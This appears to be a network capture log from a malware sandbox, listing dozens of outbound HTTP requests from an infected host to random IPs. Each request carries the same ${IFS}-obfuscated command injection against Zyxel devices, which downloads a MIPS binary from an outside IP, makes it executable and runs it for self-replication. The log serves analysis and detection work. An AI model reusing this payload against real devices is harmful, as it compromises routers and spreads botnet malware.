                                                      Feb 2, 2024 06:35:41.380456924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1585192.168.2.1442034108.127.206.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380521059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1586192.168.2.144800847.236.79.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380558968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1587192.168.2.1445484176.113.30.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380582094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1588192.168.2.143976062.113.17.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380614996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1589192.168.2.144061637.94.203.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380656004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1590192.168.2.143799464.157.174.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380686998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1591192.168.2.1459844126.120.7.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380737066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1592192.168.2.1436674154.254.51.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380795956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1593192.168.2.1448182120.117.208.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380826950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1594192.168.2.1449372126.118.167.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380853891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1595192.168.2.144141852.209.49.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380882978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1596192.168.2.143926214.146.226.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380908966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1597192.168.2.1446628140.162.183.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380969048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1598192.168.2.1433844103.115.25.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381007910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1599192.168.2.1438606205.231.134.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381062984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1600192.168.2.1446400212.118.61.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381088972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1601192.168.2.1460538163.240.214.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381135941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1602192.168.2.144181851.83.118.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381171942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1603192.168.2.145397278.105.165.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381189108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1604192.168.2.145726494.245.225.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381222963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1605192.168.2.145227268.119.147.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381274939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1606192.168.2.1459292117.158.104.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381328106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1607192.168.2.1437322185.120.70.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381354094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1608192.168.2.144400067.128.148.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381380081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1609192.168.2.1454434161.67.129.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381421089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1610192.168.2.1450366195.204.157.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381480932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1611192.168.2.144221051.94.167.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381513119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1612192.168.2.1442200158.78.169.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381561041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1613192.168.2.1453928126.5.232.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381597996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1614192.168.2.145330438.154.54.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381642103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1615192.168.2.144848069.158.20.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381674051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1616192.168.2.1440070195.113.200.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381712914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1617192.168.2.1436476186.95.201.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381752014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1618192.168.2.1460524113.61.46.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381782055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1619192.168.2.1457230115.234.162.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381830931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1620192.168.2.145241038.192.10.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381861925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1621192.168.2.1456634119.232.242.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381922007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1622192.168.2.144904669.19.38.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381942987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1623192.168.2.1449934194.149.165.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.381990910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1624192.168.2.1433154167.95.87.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382071018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1625192.168.2.145002488.62.178.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382085085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1626192.168.2.143496047.252.72.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382128000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1627192.168.2.143817092.44.99.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382159948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1628192.168.2.1460102129.174.48.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382200003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1629192.168.2.144625834.47.98.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382227898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1630192.168.2.1435114109.169.23.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382271051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1631192.168.2.143393884.61.115.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382428885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1632192.168.2.145745241.104.93.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382466078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1633192.168.2.1455654190.116.133.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382484913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1634192.168.2.1444992146.28.220.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382520914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1635192.168.2.143697853.96.248.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382551908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1636192.168.2.1453176165.192.237.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382599115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1637192.168.2.144972091.105.45.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382656097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1638192.168.2.1448004193.4.32.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382679939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1639192.168.2.1433504121.101.116.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382715940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1640192.168.2.143690085.214.66.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382774115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1641192.168.2.145097651.45.76.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382803917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1642192.168.2.1457872159.37.250.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382858038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1643192.168.2.1446886186.123.138.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382894039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1644192.168.2.1436382212.195.26.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382930040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1645192.168.2.145360092.72.161.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.382977009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1646192.168.2.145320298.181.64.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383008957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1647192.168.2.144718417.158.76.189443
                                                      TimestampBytes transferredDirectionData
